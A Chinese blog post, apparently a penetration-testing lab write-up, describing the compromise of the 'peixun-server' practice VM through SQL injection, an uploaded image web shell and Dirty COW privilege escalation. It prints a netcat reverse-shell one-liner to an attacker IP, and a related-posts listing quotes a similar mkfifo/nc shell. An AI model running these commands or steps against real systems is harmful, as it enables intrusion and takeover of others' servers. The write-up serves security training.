靶机渗透之peixun-server提权

最新推荐文章于 2023-12-22 17:12:24 发布
最新推荐文章于 2023-12-22 17:12:24 发布
阅读量312 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/108608986
版权

攻击机:

主机发现:

信息收集:

端口详细信息:

尝试访问80端口,发现其有一web站点可以访问:

对url:http://192.168.11.128/storypage_04.php?id=115进行测试,检查是否有SQL注入漏洞:

报错,此处应该有注入点。

爆破数据库名:

得到该数据库的所有数据库名:information_schema,mysql,performance_schema,tcic,test

爆当前使用的数据库为tcic:

爆表名:

tcic_account的字段:

爆account和password的数据:

拿到管理员的账号密码。

然后扫描后台网址:

发现后台为http://192.168.11.128/back,尝试访问:

用之前获取到的管理员账号密码登录:

对后台各个功能进行使用,发现“首页管理系统”中的“新增大图”能上传图片,制作图片马上传,看看能不能用,成功:

用菜刀连接试试:

http://192.168.11.133/back/upload/banner_66.php

连接成功,拿到webshell(注:中途重装过peixun-server,故IP变为192.168.11.133)。

下面尝试提权。

蚁剑输入命令:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.130 6666 >/tmp/f

然后在kali开启监听6666端口,反弹shell成功:

然后提权:

蚁剑上传dirty.c到服务器:

编译:

脏牛执行成功:

提权成功:

 

得到了root:

KogRow(接毕设和大作业版)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
靶机测试--peixun-server
ximo的博客
03-15 127
目录信息收集主机发现端口扫描目录扫描漏洞发现及利用提权总结 信息收集 主机发现 端口扫描 目录扫描 漏洞发现及利用 访问80端口: 在很多页面中,有一个页面存在sql注入: url: http://192.168.133.146/storypage_04.php?id=115 我吐槽一下,这个环境好慢啊,在点页面上花了好久时间。 输入:?id=115' and 1=1 # 根据回显,多了个单引号。 大概率判断为数字型注入。 ?id=115 and 1=1 # 回显正常,判断出数字型注入。 判
peixun-server 靶机渗透
weixin_44769042的博客
10-23 188
靶机记录--6 目录 主机发现 端口扫描 服务版本,操作系统,中间件扫描 访问80端口web端 sql注入 单引号报错 and 1=1,页面正常 and 1=2,页面无了 是一个数字型注入点 判断回显点 爆出当前库名 爆出表名 然后爆出列名(在tcic_account 表里找到有有用的) 爆出用户名密码 这里还可以直接用sqlmap去跑 扫一下目录 后台里找好东西 getshell 提权 总结 主机发现 端口扫描 服务版本,操作系统,中间件...
第三方组件提权-SQL server提权
Love&Share
11-20 2592
文章目录基础MSSQL权限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell提权使用xp_cmdshell进行提权以下内容为转载使用sp_oacreate进行提权|无回显sp_oacreate简介sp_oacreate使用沙盒提权SQL Server 沙盒简介JOB提权使用xp_regwrite提权 | 映像劫持提权其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
靶机记录(八):VM-peixun-server
weixin_47306547的博客
10-29 276
目录 主机发现 端口扫描 SSH尝试连接 Web渗透 目录扫描 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 SSH尝试连接 Web渗透 目录扫描 会员登录没啥卵用 GetShell mkfifo /tmp/t cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t 提权 这个失败了 脏牛提权 链接:...
安全狐】靶机渗透_bulldog2(附下载靶机地址)
安全狐
12-22 681
一、主机发现 方法1 nmap -sn 192.168.106.0/24 方法二 netdiscover 主动:netdiscover -i eth0 -r 192.168.106.0/24 二、端口扫描(masscan/nmap) masscan --rate=10000 --ports 0-65535 192.168.106.132 发包数默认为100个 三、端口服务 服务确认 nmap -sV -T4 -O -p 8080,23,80 IP -sV服...
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2830
dc-5靶场详细渗透过程
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3616
dc-8靶场详细渗透过程
FunBox11靶场 安装下载渗透详细教程
最新发布
qq_41245301的博客
12-22 1387
3.通过扫描发现开启了ftp服务并且ftp的版本很低我们可用尝试通过这个服务进攻击。靶机通常在root目录下有个root.txt的文件看到它表示这个靶机已经拿下。我们发现这个版本的ftp是有漏洞的而且在msf中有对应的漏洞利用模块。-A : 启动Os检测,版本检测,脚本扫描和traceroute。通常情况我们是通过服务的名称加版本配合search进行搜索。1.提供arp-scan工具扫描网络主机IP。2.通过nmap 对目标主机进行扫描。选择一个合适的payload进行设置。查看可用的payload列表。
渗透Gemimi靶机
午夜安全
10-31 1240
渗透Gemimi靶机 1.nmap扫描与源码审计 使用Nmap扫描靶机如下。 发现22、80端口开着,访问web服务。 发现源码地址,下载源码审计。 发现疑似用户登录密码的信息: 尝试使用admin,1234登录,发现成功登录,如下所示: 登陆后,经过一番探索,发现有一个Edit profie和Export profile,体验这两个功能,我们发现Edit pro...
VulnHub PowerGrid 1.0.1靶机渗透
Jonah_Bare的博客
06-25 1167
​本文首发于微信公众号,未经授权,禁止转载。 难度评级:☆☆☆☆☆官网地址:https://download.vulnhub.com/powergrid/PowerGrid-1.0.1.ova天翼盘:https://cloud.189.cn/t/2UN7Ffiuqyym百度网盘:https://pan.baidu.com/s/10l8dshcdaLxWL7eGN92U4Q 提取码:r4zc官网简介:靶机会进行计时,即使关闭虚拟机也不会停止,超时后将销毁证据渗透目标:获取root权限,找到4个flag本
CTF6 靶机渗透
猎荒者
02-19 1779
兵无常势,水无常形,能因敌而致胜者,谓之神 1. 环境准备 VMware workstation Pro12 Kali Linux (IP: 10.10.16.133) CTF6 虚拟机 NAT 网络设置 2. 靶机渗透 2.1 主机发现 可以有以下三种方式: netdiscover -r 10.10.16.133 (使用) arp-scan -l fping -asg ...
kali渗透综合靶机(十五)--Breach-1.0靶机
W小哥
04-01 2232
一、靶机下载 下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip 二、Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho...
kali渗透综合靶机(十七)--HackInOS靶机
W小哥
04-03 1141
一、靶机下载 下载链接:https://www.vulnhub.com/hackinos/HackInOS.ova 二、HackInOS靶机搭建 攻击机kali搭建在Vmware,桥接模式,ip:192.168.43.48 靶机HackInOS需要用VirtualBox导入ova文件,桥接模式,启动完成之后, 选择Ubuntu系统,因为是模拟攻击就先不登录靶机,ip:192.168.43.104 ...
VulnHub靶机maskcrafter-1.1渗透
xingjinhao123的博客
03-04 206
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/maskcrafter-11,445/ 这个靶机有两种办法获取用户,两种办法获取root,不需要暴力破解 运行环境: 靶机:网络设为NAT模式,IP地址:192.168.174.136 攻击机:同网段下的kali linux,IP地址为:192.168.174.135 开始渗透 运行靶机 获取靶机IP地址 扫描端口及其服务 这里看到了很多端口一个一个访问 先访问21端口的ftp服务 将pub目录下的两个文件下载到本
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值